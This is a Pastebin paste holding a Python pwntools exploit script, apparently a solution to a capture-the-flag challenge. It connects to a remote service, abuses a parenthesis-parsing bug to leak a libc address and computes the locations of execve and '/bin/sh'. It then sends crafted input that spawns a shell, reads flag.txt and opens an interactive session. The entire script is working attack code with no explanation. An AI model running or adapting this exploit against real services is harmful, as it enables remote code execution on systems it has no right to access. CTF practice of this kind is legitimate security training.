Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # -*- coding: utf-8 -*-
- import pwn
- def unsign(address):
- return int(address) if int(address) > 0 else int(address) + 2**32
- c = pwn.connect('h4x.0x04.net', 1337)
- libc_hack = '(' * 31 + '+' + '((0+(((+' + 35 * ')'
- c.sendline(libc_hack)
- libc_adr = c.recvline()
- libc_adr = unsign(libc_adr)
- libc_local_pwned = pwn.ELF('libc-2.19.so')
- libc_start_pos = libc_local_pwned.symbols['__libc_start_main']
- execve_pos = libc_local_pwned.symbols['execve']
- binsh_pos = list(libc_local_pwned.search('/bin/sh'))[0]
- # Z serwera wyciągnęlismy adres libc_start_main przesunięty o 243
- libc_server = libc_adr - 243 - libc_start_pos
- execve_server = libc_server + execve_pos
- binsh_server = libc_server + binsh_pos
- execve_server = unsign(execve_server)
- binsh_server = unsign(binsh_server)
- shellhack = '(' * 31 + '+' + '(((+(((' + str(0) + ')' * 35 + '\n'
- shellhack += '(' * 31 + '+' + '(((+((' + str(0) + ')' * 34 + '\n'
- shellhack += '(' * 31 + '+' + '(((+(' + str(binsh_server) + ')' * 33 + '\n'
- shellhack += '(' * 31 + '+' + '(((+' + str(0) + ')' * 32 + '\n'
- shellhack += '(' * 31 + '+' + '(((' + str(execve_server) + ')' * 33 + '\n'
- c.sendline(shellhack)
- c.sendline('cat flag.txt\n')
- c.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement